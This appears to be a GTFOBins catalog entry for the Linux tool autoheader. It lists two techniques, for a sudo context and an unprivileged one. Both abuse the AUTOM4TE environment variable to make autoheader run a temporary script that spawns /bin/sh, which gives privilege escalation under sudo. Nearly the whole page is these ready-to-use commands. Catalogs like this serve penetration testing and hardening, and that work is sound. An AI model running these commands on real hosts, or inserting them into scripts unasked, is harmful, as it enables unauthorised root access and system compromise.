Catalog GTFOBins

GTFO · Tool

autoheader

2 techniques LinuxGTFOBins GPL-3.0

shell

ExecutionPrivilege Escalation Linux
echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoheader
Context
sudo
Native
shell
MITRE
T1059

shell

Execution Linux
echo '/bin/sh 1>&0' >/path/to/temp-file
chmod +x /path/to/temp-file
touch configure.ac
AUTOM4TE=/path/to/temp-file autoheader
Context
unprivileged
Native
shell
MITRE
T1059